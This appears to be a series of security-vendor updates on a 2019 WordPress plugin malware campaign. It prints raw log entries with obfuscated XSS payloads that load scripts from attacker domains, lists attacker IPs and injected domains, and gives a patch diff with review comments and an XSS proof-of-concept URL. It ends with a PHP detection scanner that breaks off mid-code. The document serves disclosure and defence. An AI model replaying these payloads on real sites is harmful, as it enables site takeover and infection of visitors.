Plugins added to Malware Campaign: November 2019

This is an update for the long-lasting malware campaign targeting vulnerable plugins since January. Please check our previous updates below:

Plugins Under Attack: November 2019

Although attackers focused this month on infecting sites via the attack vectors described here, at the very end of the month we also detected the same behavior targeting the plugins listed below.

Plugins that are continuing to be leveraged by attackers are:

Plugin Payloads Added to the Campaign

Folders

46.101.174.128 - type=attachment&width=%3C%2Fstyle%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Ftop.worldctraffic.com%2Ftop%27%3E%3C%2Fscript%3E%3Cstyle%3E [23/Nov/2019:12:19:33 +0000] "POST /wp-admin/admin-ajax.php?action=wcp_change_post_width HTTP/1.1" 

Simple Fields

46.101.174.128 - action=simple_fields_do_import&import-json=%7B%0A++++%22field_groups%22%3A+%7B%0A++++++++%221%22%3A+%7B%0A++++++++++++%22id%22%3A+1%2C%0A++++++++++++%22key%22%3A+%22test%22%2C%0A++++++++++++%22slug%22%3A+%22test%22%2C%0A++++++++++++%22name%22%3A+%22test%22%2C%0A++++++++++++%22description%22%3A+%22%22%2C%0A++++++++++++%22repeatable%22%3A+false%2C%0A++++++++++++%22fields%22%3A+%5B%5D%2C%0A++++++++++++%22fields_by_slug%22%3A+%5B%5D%2C%0A++++++++++++%22deleted%22%3A+false%2C%0A++++++++++++%22gui_view%...skipped...%22deleted%22%3A+false%2C%0A++++++++++++%22hide_editor%22%3A+false%2C%0A++++++++++++%22added_with_code%22%3A+false%2C%0A++++++++++++%22field_groups_count%22%3A+1%0A++++++++%7D%0A++++%7D%2C%0A++++%22post_type_defaults%22%3A+%5B%0A++++++++false%0A++++%5D%0A%7D&import-what=textarea&simple-fields-import-type=replace [23/Nov/2019:13:02:05 +0000] "POST /wp-admin/admin-post.php HTTP/1.1" 

Malicious Domains and IPs:

IPs:

198.12.70.83
89.238.167.46
181.58.70.192
84.237.142.110
91.215.187.211
46.101.174.128

Domains Injected:

  • https[:]//top[.]worldctraffic[.]com/cas?/java.js?t=2&

We strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.

Wrong content-type to XSS

WordPress Social Sharing Plugin – Sassy Social Share, which currently has over 100,000 installations, just fixed a cross-site scripting vulnerability. The bug allows attackers to craft custom links that direct unsuspecting users to a vulnerable page; from that page, they typically use a variety of methods to trigger their proof of concept.

Let’s take a look at the patch:

+++ b/sassy-social-share.new/public/class-sassy-social-share-public.php
@@ -1511,6 +1511,7 @@ class Sassy_Social_Share_Public {
        private function ajax_response( $response ) {
                $response = apply_filters( 'heateor_sss_ajax_response_filter', $response );
+               header( 'Content-Type: application/json' );
                die( json_encode( $response ) );

        }
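Review bot: the new `header( 'Content-Type: application/json' );` only takes effect if nothing has been echoed before `ajax_response()` runs, which is the normal case under admin-ajax.php; the same fix with less to get wrong is `wp_send_json( $response )`, which sets the JSON content type (with the site charset), encodes and exits in one call, so the `die( json_encode( $response ) )` line would go as well. Keep the `heateor_sss_ajax_response_filter` call ahead of it so filtered output still gets the header.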
@@ -1540,7 +1541,7 @@ class Sassy_Social_Share_Public {
                if ( isset( $_GET['urls'] ) && count( $_GET['urls'] ) > 0 ) {
                        $target_urls = array_unique( $_GET['urls'] );
                        foreach ( $target_urls as $k => $v ) {
-                               $target_urls[$k] = esc_attr( $v );
+                               $target_urls[esc_attr( $k )] = esc_attr( $v );
                        }
                }
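Review bot: `esc_attr()` on the key in `$target_urls[esc_attr( $k )] = esc_attr( $v );` closes the reflection, but it is HTML-context escaping applied to data that ends up in a JSON body, so the real protection is the content-type change in the first hunk. Two things to tighten: `count( $_GET['urls'] )` runs before checking that `urls` is an array (a scalar `?urls=x` gives a warning on PHP 7.2+ and a TypeError on PHP 8), so guard with `is_array( $_GET['urls'] )` first; and since the values are URLs to look up share counts for, `esc_url_raw()` (or dropping entries that fail `wp_http_validate_url()`) is the fitting sanitizer for `$v`, with the client-supplied keys discarded via `array_values()` rather than echoed back.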

The JSON data returned to the user had no content type defined in the ajax_response() function, so the default (HTML) applied. Together with the following snippet, which registers the endpoint for both logged-in (wp_ajax_) and unauthenticated (wp_ajax_nopriv_) requests, this makes the bug really easy for attackers to exploit:

includes/class-sassy-social-share.php

add_action( 'wp_ajax_heateor_sss_sharing_count', array( $plugin_public, 'fetch_share_counts' ) );
add_action( 'wp_ajax_nopriv_heateor_sss_sharing_count', array( $plugin_public, 'fetch_share_counts' ) );

Because of the nature of the bug, and because the issue has already been fixed, we can share a simple PoC that shows how a malicious link abusing this vulnerability might look:

http://vulnerablesite.com/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[<h onmouseover%3Dalert(1)>]=hola.com&urls[1]=hola2.com

If you have an old version of this plugin installed please update to the latest version (3.3.4) asap. You can add a WAF as a second layer of protection and virtually patch the vulnerability.

Plugins added to Malware Campaign: October 2019

This is an update for the long-lasting malware campaign targeting vulnerable plugins during August and September. Please check our previous updates below:

Plugins Under Attack: October 2019

Plugins that are continuing to be leveraged by attackers are:

Plugin Payloads Added to the Campaign

Blog Designer

185.238.0.214 - action=save&blog_nonce=save&custom_css=%3C%2Fstyle%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27%26%23x64%3B%26%23x61%3B%26%23x74%3B%26%23x61%3B%26colon%3B%26%23x74%3B%26%23x65%3B%26%23x78%3B%26%23x74%3B%26sol%3B...skipped...%3B%26lpar%3B%26%23x63%3B%26rpar%3B%26semi%3B%26rcub%3B%27%3E%3C%2Fscript%3E%3Cstyle%3E&updated=true] "POST /wp-admin/admin-ajax.php HTTP/1.1"

WPeMatico RSS Feed Fetcher

159.65.65.204 - "GET /wp-admin/admin-post.php?wpematico-action=settings_tab_settings HTTP/1.1" 200 5 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0" 

Smart Google Code Inserter

192.169.159.241 - action=savegooglecode&home=https://track.beforwardplay.com/track/uu?t=1&&sgcgoogleanalytic=<script type=text/javascript src='data&colon;text&sol;javascript&comma;if&lpar;document&period;head&rpar;&lcub;&Tab;var b &equals; document&semi;var c &equals; b&period;createEle&#...skipped...arCode&lpar;104&comma;101&comma;97&comma;100&rpar;&rpar;&lsqb;0&rsqb;&period;appendChild&lpar;c&rpar;&semi;&rcub;'></script>&sgcwebtools=&siteurl=https://track.beforwardplay.com/track/uu.js?t=1& "POST /wp-admin/admin-ajax.php HTTP/1.1"

Post Custom Templates Lite

192.99.38.186 - otw_pctl_action=manage_otw_pctl_options&otw_pctl_custom_css=</textarea><script type=text/javascript src='data&colon;text&sol;javascript&comma;if&lpar;document&period;head&rpar;&lcub;&Tab;var b &equals; document&semi;var&...skipped...&lpar;c&rpar;&semi;&rcub;'></script> "POST /wp-admin/admin-post.php HTTP/1.1" 

Woody Ad Snippets

162.241.149.54 - --fa51ba6a52e563a3b66864f78f10c9009cf9ed0c0018b2e8242f0db167a5\x0D\x0AContent-Disposition: form-data; name=\x22wbcr_inp_import_files\x22; filename=\x22lc.json\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0A{\x22generator\x22:\x22x\x22,\x22date_created\x22:\x22x\x22,\x22snippets\x22:[{\x22name\x22:\x22x\x22,\x22title\x22:\x22\x22,\x22content\x22:\x22x\x22,\x22location\x22:\x22header\x22,\x22type\x22:\x22php\x22,\x22filters\x22:\x22\x22,\x22changed_filters\x22:\x220\x22,\x22scope\x22:\x22everywhere\x22,\x22description\x22:\x22<script type=text/javascript src='https://cls.balantfromsun.com/cls.js?z=1&&v=2'></script>\x22,\x22attributes\x22:\x22\x22,\x22tags\x22:[]}]}\x0D\x0A--fa51ba6a52e563a3b66864f78f10c9009cf9ed0c0018b2e8242f0db167a5\x0D\x0AContent-Disposition: form-data; name=\x22swpsmtp_import_settings\x22\x0D\x0A\x0D\x0A1\x0D\x0A--fa51ba6a52e563a3b66864f78f10c9009cf9ed0c0018b2e8242f0db167a5\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Aswpsmtp_clear_log\x0D\x0A--fa51ba6a52e563a3b66864f78f10c9009cf9ed0c0018b2e8242f0db167a5--\x0D\x0A] "POST /wp-admin/admin-post.php HTTP/1.1"

FV Flowplayer Video Player

162.241.149.54 - action=fv_wp_flowplayer_email_signup&email=%3Csvg%2Fonload%3Deval%28String.fromCharCode%2832%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C32%2C123%2C10%2C32%2C32%2C32%2C32%2C118%2C97%2C114%2C32%2C101%2C108%2C101%2C109%2C32%2C61%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C39%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C41%2C59%2C32%2C10%2C9%2C101%2C108%2C101%2C109%2C46%2C116%2C121%2C112%2C101%2C32%2C61%2C32%2C39%2C116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C59%2C32%2C10%2C32%2C32%2C32%2C32%2C101%2C108%2C101%2C109%2C46%2C115%2C114%2C99%2C32%2C61%2C32%2C39%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C99%2C108%2C115%2C46%2C98%2C97%2C108%2C97%2C110%2C116%2C102%2C114%2C111%2C109%2C115%2C117%2C110%2C46%2C99%2C111%2C109%2C47%2C99%2C108%2C115%2C46%2C106%2C115%2C63%2C122%2C61%2C49%2C55%2C38%2C39%2C59%2C10%2C32%2C32%2C32%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C34%2C104%2C101%2C97%2C100%2C34%2C41%2C91%2C48%2C93%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C40%2C101%2C108%2C101%2C109%2C41%2C59%2C10%2C32%2C32%2C125%2C41%2C40%2C41%2C59%29%29%3E%40test.com&list=1 [08/Oct/2019:12:54:03 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Poll, Survey, Form & Quiz Maker

50.63.162.9 -  "GET /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email=\x22><script type=text/javascript src='https://cd.privacylocationforloc.com/track&v15'></script> HTTP/1.1"

DELUCKS SEO

167.99.232.64 - dpc%5Bbasic_metadata%5D%5Battachments%5D%5Bfollow%5D=follow&dpc%5Bbasic_metadata%5D%5Battachments%5D%5Bindex%5D=index&dpc%5Bbasic_metadata%5D%5Bcategories%5D%5B1%5D%5Bfollow%5D=follow&dpc%5Bbasic_metadata%5D%5Bcategories%5D%5B1%5D%5Bindex%5D=index&dpc%5Bbasic_metadata%5D%5Bdpc_status_basic_metadata%5D=1&dpc%5Bbasic_metadata%5D%5Ben%5D%5Barchives%5D%5Btitle%5D%5Bdelimiter%5D=-&dpc%5Bbasic_metadata%5D%5Ben%5D%5Barchives...skipped...5Bgoogle%5D=%22%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Fcd.privacylocationforloc.com%2Ftrack%26v9%27%3E%3C%2Fscript%3E&dpc%5Bbasic_metadata%5D%5Bverify%5D%5Bpinterest%5D=&dpc%5Bbasic_metadata%5D%5Bverify%5D%5Byandex%5D=%22%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Fcd.privacylocationforloc.com%2Ftrack%26v9%27%3E%3C%2Fscript%3E&dpc_save_settings=1 "POST /wp-admin/admin-post.php HTTP/1.1" 

Social Metrics Tracker

50.63.162.9 - gapi_client_id=%22%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Fcd.privacylocationforloc.com%2Ftrack%26v5%27%3E%3C%2Fscript%3E "POST /wp-admin/admin-post.php?page=social-metrics-tracker-export&smt_download_export_file=1&section=gapi HTTP/1.1"

Malicious Domains and IPs:

IPs:

159.65.65.204
192.169.243.42
167.99.232.64
50.63.162.9
192.169.159.241
185.238.0.214
192.99.38.186
159.203.175.216
80.211.164.226
162.241.149.53
186.147.2.49

Domains Injected:

  • track[.]beforwardplay[.]com
  • cls[.]balantfromsun[.]com
  • cd[.]privacylocationforloc[.]com
  • bes[.]belaterbewasthere[.]com
  • ave[.]cervantes[.]es
  • hungthinhsg[.]com[.]vn

We strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.

Plugins added to Malware Campaign: September 2019

This is an update for the long-lasting malware campaign targeting vulnerable plugins during August and September. Please check our previous updates below:

Plugins Under Attack: September 2019

Plugins that are continuing to be leveraged by attackers are:

Plugin Payloads Added to the Campaign

Rich Reviews

149.202.215.42 - read-more-text=Readme+more%22%3B%3C%2Fscript%3E%3Cscript+type%3Dtext%2Fjavascript+%3Eeval%28String.fromCharCode%2832%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C32%2C123%2C10%2C32%2C32%2C32%2C32%2C118%2C97%2C114%2C32%2C101%2C108%2C101%2C109%2C32%2C61%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C39%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C41%2C59%2C32%2C10%2C9%2C101%2C108%2C101%2C109%2C46%2C116%2C121%2C112%2C101%2C32%2C61%2C32%2C39%2C116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C59%2C32%2C10%2C32%2C32%2C32%2C32%2C101%2C108%2C101%2C109%2C46%2C115%2C114%2C99%2C32%2C61%2C32%2C39%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C98%2C101%2C1...skipped...%2C67%2C104%2C105%2C108%2C100%2C40%2C101%2C108%2C101%2C109%2C41%2C59%2C10%2C32%2C32%2C125%2C41%2C40%2C41%2C59%29%29%3B%3C%2Fscript%3E%3Cscript%3E&update=rr-update-options [28/Sep/2019] "POST /wp-admin/admin-post.php?page=fp_admin_options_page"

Blog Designer

62.76.25.158 - action=save&custom_css=%3C%2Fstyle%3E%3Cscript+++type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+c+%3D+0%3Bvar+_fr2cdmdy7%3DString.fromCharCode%28104%2F%2A%2A%2F%2C116%2F%2A_y78qgjy8u%2A%2F%2C116%2F%2A_y78qgjy8u%2A%2F%2C112%2F%2A%2A%2F%2C115%2F%2A%2A%2F%2C58%2F%2A_58zwawter%2A%2F%2C47%2F%2A_1scpswrsv%2A%2F%2C47%2F%2A_58zwawter%2A%2F%2C100%2F%2A%2A%2F%2C110%2F%2A_fr2cdmdy7%2A%2F%2C115%2F%2A_58zwawter%2A%2F%2C46%2F%2A_fr2cdmdy7%2A...skipped...B_y78qgjy8u.send%28+null+%29%3Breturn+_y78qgjy8u.responseText%3B%7Dfunction+_wwsyflqj0%28todo%29%7B+var+_avq14iyav+%3D+new+Function%28%27x%27%2C+%27y%27%2C+todo%2B%27+return+x%2By%3B%27%29%3B_avq14iyav%280%2C0%29%3B%7D%3C%2Fscript%3E%3Cstyle%3E&updated=true [23/Sep/2019:05:04:38 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Coming Soon Page and Maintenance Mode

62.76.25.158 - action_rcs=action_rcs_page_setting_save_post&home_sec_link_txt=off&hook=general&logo_enable=on&logo_height=1&logo_width=1&rcsp_description=%3Cscript++type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+c+%3D+0%3Bvar+_vw5ansga3qp4fwa%3DString.fromCharCode%28104%2F%2A%2A%2F%2C116%2F%2A_w1g30wg9f776x67%2A%2F%2C116%2F%2A_w1g30wg9f776x67%2A%2F%2C112%2F%2A%2A%2F%2C115%2F%2A%2A%2F%2C58%2F%2A_nugjx0jhw9l3b4f%2A%2F%2C47%2F%2A_ug3v7obje18b87n%2A%2F%2C47%2F%2A_nugjx0jhw9l3b4f%2A%2F%2C100%2F%2A%2A%2F%2C110%2F%2A_vw5ansga3qp4fwa%2A%2F%2C115%2F%2A_nugjx0jhw9l3b4f%2A%2F%2C46%2F%2A_vw5ansga3qp4fwa%2A%2F%2C99%2F%2A_ug3v7obje18b87n%2A%2F%2C114%2F%2A_vw5ansga3qp4fwa%2A%2F%2C101%2F%2A_nugjx0jhw9l3b4f%2A%2F%2C97%2F%2A%2A%2F%2C116%2F%2A%2A%2F%2C101%2F%2A%2A%2F%2C114%2F%2A_ug3v7obje18b87n%2A%2F%2C101%2F%2A_nugjx0jhw9l3b4f%2A%2F%2C108%2F%2A%2A%2F%2C97%2F%2A_w1g30wg9f776x67%2A%2F%2C116%2F%2A_ug3v7obje18b87n%2A%2F%2C105%2F%2A%2A%2F%2C118%2F%2A_nugjx0jhw9l3b4f%2A%2F%2C101%2F%2A_ug3v7obje18b87n%2A%2F%2C99%2F%2A_vw5ansga3qp4fwa%2A%2F%2C104%2F%2A_w1g30wg9f776x67%2A%2F%2C97%..skipped...%29%3B_pr3rd9vm0zvo3tw%280%2C0%29%3B%7D%3C%2Fscript%3E&rcsp_headline=was+here&rcsp_logo_url=https%3A%2F%2Fave.cervantes.es%2Fsites%2Fdefault%2Ffiles%2Fdemocursos_aveglobal.jpg [23/Sep/2019] "POST /wp-admin/admin-post.php?page=wpsm_responsive_coming_soon HTTP/1.1" 

WP Quick Booking Manager

62.76.25.158 - action=gen_save_cssfixfront&css=%3C%2Fstyle%3E%3Cscript+++type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+c+%3D+0%3Bvar+_3evx21%3DString.fromCharCode%28104%2F%2A%2A%2F%2C116%2F%2A_tp5mxm%2A%2F%2C116%2F%2A_tp5mxm%2A%2F%2C112%2F%2A%2A%2F%2C115%2F%2A%2A%2F%2C58%2F%2A_h01hcw%2A%2F%2C47%2F%2A_tx1yiy%2A%2F%2C47%2F%2A_h01hcw%2A%2F%2C100%2F%2A%2A%2F%2C110%2F%2A_3evx21%2A%2F%2C115%2F%2A_h01hcw%2A%2F%2C46%2F%2A_3evx21%2A%2F%2C99%2F%2A_tx1yiy%2A%2F%2C114%2F%2A_3evx21%2A%2F%2C101%2F%2A_h01hcw%2A%2F...skipped...iy%28_0wg1jn%29%7B+var+_tp5mxm+%3D+new+XMLHttpRequest%28%29%3B_tp5mxm.open%28+String.fromCharCode%2871%2C69%2C84%29%2C+_0wg1jn%2C+false+%29%3B_tp5mxm.send%28+null+%29%3Breturn+_tp5mxm.responseText%3B%7Dfunction+_ocrrhn%28todo%29%7B+var+_fta15b+%3D+new+Function%28%27x%27%2C+%27y%27%2C+todo%2B%27+return+x%2By%3B%27%29%3B_fta15b%280%2C0%29%3B%7D%3C%2Fscript%3E%3Cstyle%3E&cssfix=front [23/Sep/2019:05:04:30 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"

WP Private Content Plus

62.76.25.158 - submit=Save%2BChanges&wppcp_general%5Bpost_page_redirect_url%5D=https%3A%2F%2Fdns.createrelativechanging.com%2Fsub%2Ftfso.js%3Fz%3D6%26&wppcp_general%5Bprivate_content_module_status%5D=1&wppcp_general%5Bprivate_mod%5D=1&wppcp_tab=wppcp_section_general [23/Sep/2019] "POST /wp-admin/admin-ajax.php?page=wppcp-settings HTTP/1.1"

woocommerce-ajax-filters

78.142.211.111 - - [18/Sep/2019] "GET /wp-admin/admin-post.php?page=br-aapf-setup&step=wizard_selectors HTTP/1.1" 

Malicious Domains and IPs:

149.202.215.42
62.76.25.158
132.148.27.189
185.212.128.201
213.128.89.176
167.99.232.64
207.154.198.108
159.203.86.82
192.95.14.196
162.241.175.243
104.248.237.226
104.238.72.132
46.101.174.128
51.68.204.149
188.166.188.152
104.236.178.208
162.243.13.195
45.252.249.240
158.69.194.57
139.59.116.30
78.142.211.111
51.38.38.1
91.234.217.135
82.223.69.53
51.158.72.203
162.243.165.84
175.126.62.37
104.238.99.130
45.32.104.33
139.99.106.10
153.126.194.159
142.44.151.107
186.202.161.191
192.169.243.42
178.62.93.109
159.65.155.168
217.182.95.250

Domains Injected:

  • dns.createrelativechanging[.]com
  • bes.belaterbewasthere[.]com
  • gabriellalovecats[.]com
  • www.dzobainteriors[.]com
  • ns1.bullgoesdown[.]com

We strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.

Plugins Under Attack: August 2019

This is an update for the long-lasting malware campaign targeting vulnerable plugins during August and September. Please check our previous updates below:

Plugins Under Attack: August 2019

Plugins that are continuing to be leveraged by attackers for months are:

Plugin Payloads Added to the Campaign

Simple-301-redirects-addon-bulk-uploader

178.128.193.158 - --43a8d1df3e809162dd41895414f1186f7a8ba38c778819fb80d2e3a13911\x0D\x0AContent-Disposition: form-data; name=\x22301_bulk_redirects\x22; filename=\x22301_redirects.csv\x22\x0D\x0AContent-Type: application/csv\x0D\x0A\x0D\x0A/,https://developsincelock.com/54768?\x0D\x0A*,https://developsincelock.com/5868?\x0D\x0A/*,https://developsincelock.com/34234?\x0D\x0A\x0D\x0A--43a8d1df3e809162dd41895414f1186f7a8ba38c778819fb80d2e3a13911\x0D\x0AContent-Disposition: form-data; name=\x22submit_bulk_301\x22\x0D\x0A\x0D\x0A1\x0D\x0A--43a8d1df3e809162dd41895414f1186f7a8ba38c778819fb80d2e3a13911\x0D\x0AContent-Disposition: form-data; name=\x22auto_detect_end_line\x22\x0D\x0A\x0D\x0A0\x0D\x0A--43a8d1df3e809162dd41895414f1186f7a8ba38c778819fb80d2e3a13911\x0D\x0AContent-Disposition: form-data; name=\x22wpnonce\x22\x0D\x0A\x0D\x0A887cc0cb2f\x0D\x0A--43a8d1df3e809162dd41895414f1186f7a8ba38c778819fb80d2e3a13911\x0D\x0AContent-Disposition: form-data; name=\x22_wp_http_referer\x22\x0D\x0A\x0D\x0A/wp-admin/options-general.php?page=301bulkoptions\x0D\x0A--43a8d1df3e809162dd41895414f1186f7a8ba38c778819fb80d2e3a13911--\x0D\x0A [28/Aug/2019:13:56:32 +0000] "POST /wp-admin/admin-post.php?page=301bulkoptions HTTP/1.1" 

Kiwi-Social-Share

162.243.126.96 - action=kiwi_social_share_set_option&args=%7B%27option%27%3A+%27users_can_register%27%2C+%27value%27%3A+%271%27%7D [17/Aug/2019:13:00:36 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Nd-learning

158.69.194.57 - action=nd_learning_import_settings_php_function&nd_learning_value_import_settings=siteurl%5Bnd_learning_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1%26%5Bnd_learning_end_option%5D [09/Aug/2019:03:02:54 +0000] "POST /wp-admin/admin-ajax.php?nd_learning_value_import_settings=siteurl[nd_learning_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_learning_end_option] HTTP/1.1" 
158.69.194.57 - action=nd_stats_import_settings_php_function&nd_stats_value_import_settings=siteurl%5Bnd_stats_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1%26%5Bnd_stats_end_option%5D [09/Aug/2019:03:02:54 +0000] "POST /wp-admin/admin-post.php?nd_stats_value_import_settings=siteurl[nd_stats_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_stats_end_option] HTTP/1.1" 
158.69.194.57 - action=nd_travel_import_settings_php_function&nd_travel_value_import_settings=home%5Bnd_travel_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret%3Fl%3D1%26%5Bnd_travel_end_option%5D [09/Aug/2019:03:02:54 +0000] "POST /wp-admin/admin-ajax.php?nd_travel_value_import_settings=home[nd_travel_option_value]https://jackielovedogs.com/pret?l=1&[nd_travel_end_option] HTTP/1.1" 

Responsive-coming-soon

158.69.194.57 - action_rcs=action_rcs_page_setting_save_post&home_sec_link_txt=off&logo_enable=off&rcsp_description=off&rcsp_headline=%3Cscript+async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%28116%2C114%2C101%2C114%2C53%2C55%2C56%2C52%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+Strin...skipped...%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E [09/Aug/2019:03:02:53 +0000] "POST /wp-admin/admin-post.php?page=wpsm_responsive_coming_soon HTTP/1.1"

Nd-donations

158.69.194.57 - action=nd_donations_import_settings_php_function&nd_donations_value_import_settings=siteurl%5Bnd_donations_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1%26%5Bnd_donations_end_option%5D [09/Aug/2019:03:02:53 +0000] "POST /wp-admin/admin-post.php?nd_donations_value_import_settings=siteurl[nd_donations_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_donations_end_option] HTTP/1.1"

Malicious Domains and IPs:

IPs:

185.238.0.34
45.12.32.105
45.12.32.102
185.238.0.33
178.128.193.158
37.122.209.28
217.61.56.11
185.18.226.161
188.213.166.219
162.243.126.96
192.169.227.95
149.202.75.164
185.104.184.109
192.169.255.17
185.238.0.35
158.69.194.57
185.238.0.146
45.12.32.55
185.238.0.133

Domains Injected:

  • wiilberedmodels.com[.]com
  • hungthinhsg[.]com[.]vn
  • developsincelock[.]com
  • bbwebsitecontent[.]com
  • bachatours[.]com
  • tomorrowwillbehotmaybe[.]com
  • jackielovedogs[.]com
  • gabriellalovecats[.]com

We strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.
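The four monthly updates above all show the same evidence: a request to admin-ajax.php or admin-post.php whose decoded body breaks out of a CSS or textarea setting, opens a script tag, and hides the URL behind HTML5 named entities or String.fromCharCode. The following command-line scanner is an added example, not tooling from the original posts: it peels those encoding layers off each log line and reports the markers plus any of the injected domains listed above. The sample lines are constructed (documentation-range IPs) to mirror the page's "ip - body [date] "request line"" format; the domain list is copied from the Domains Injected sections.

```php
<?php
// Added example, not code from the original updates: flag campaign-style payloads
// posted to the WordPress admin endpoints. Usage: php scan.php access.log
// (falls back to the constructed SAMPLE_LINES below when no file is given).
declare(strict_types=1);

// Domains from the "Domains Injected" lists above, defanging brackets removed.
const CAMPAIGN_DOMAINS = [
    'top.worldctraffic.com', 'track.beforwardplay.com', 'cls.balantfromsun.com',
    'cd.privacylocationforloc.com', 'dns.createrelativechanging.com',
    'jackielovedogs.com', 'gabriellalovecats.com', 'developsincelock.com',
];
// Endpoints the campaign posts its settings payloads to.
const WATCHED_ENDPOINTS = ['/wp-admin/admin-ajax.php', '/wp-admin/admin-post.php'];

/** Peel the encoding layers seen in the payloads so plain substring checks work. */
function normalise_payload(string $raw): string
{
    $s = $raw;
    for ($i = 0; $i < 3; $i++) {            // double URL encoding is common
        $d = urldecode($s);
        if ($d === $s) { break; }
        $s = $d;
    }
    // &colon;text&sol;javascript -> :text/javascript (HTML5 named entities)
    $s = html_entity_decode($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    // String.fromCharCode(104/*x*/,116,116,112) -> "http"
    return preg_replace_callback('/String\.fromCharCode\s*\(([^()]*)\)/i', static function (array $m): string {
        $codes = preg_replace('#/\*.*?\*/#s', '', $m[1]);      // drop inline comments
        $out = '';
        foreach (explode(',', $codes) as $n) {
            $n = trim($n);
            if ($n !== '' && ctype_digit($n)) { $out .= chr((int) $n); }
        }
        return '"' . $out . '"';
    }, $s);
}

/** @return string[] findings for one log line; empty when nothing matched */
function scan_log_line(string $line): array
{
    if (!preg_match('/"(?:GET|POST) (\S+)/', $line, $m)) { return []; }
    $path = parse_url($m[1], PHP_URL_PATH);
    if (!in_array($path, WATCHED_ENDPOINTS, true)) { return []; }

    $text = normalise_payload($line);
    $hits = [];
    if (preg_match('#</(?:style|textarea|script)>\s*<script\b#i', $text)) {
        $hits[] = 'breaks out of style/textarea/script context then opens <script>';
    } elseif (preg_match('#<script\b#i', $text)) {
        $hits[] = '<script> tag in a submitted setting';
    }
    if (preg_match('#<svg\b[^>]*\bonload\s*=#i', $text)) { $hits[] = 'svg onload handler'; }
    if (stripos($text, 'data:text/javascript') !== false) { $hits[] = 'data: URI script source'; }
    if (stripos($line, 'String.fromCharCode') !== false) { $hits[] = 'String.fromCharCode obfuscation'; }
    foreach (CAMPAIGN_DOMAINS as $domain) {
        if (stripos($text, $domain) !== false) { $hits[] = "known campaign domain $domain"; }
    }
    return $hits;
}

/** Scan many lines; returns [line number => ['ip' => ..., 'hits' => [...]]] for matches only. */
function scan_log(array $lines): array
{
    $report = [];
    foreach (array_values($lines) as $i => $line) {
        $hits = scan_log_line($line);
        if ($hits !== []) {
            $report[$i + 1] = ['ip' => strtok($line, ' '), 'hits' => $hits];
        }
    }
    return $report;
}

// Constructed samples: two benign admin requests, then payloads shaped like the ones above.
const SAMPLE_LINES = [
    '203.0.113.10 - action=heartbeat&data=x [23/Nov/2019:12:00:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"',
    '203.0.113.12 - action=save&custom_css=body%7Bcolor%3Ared%7D [23/Nov/2019:12:00:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"',
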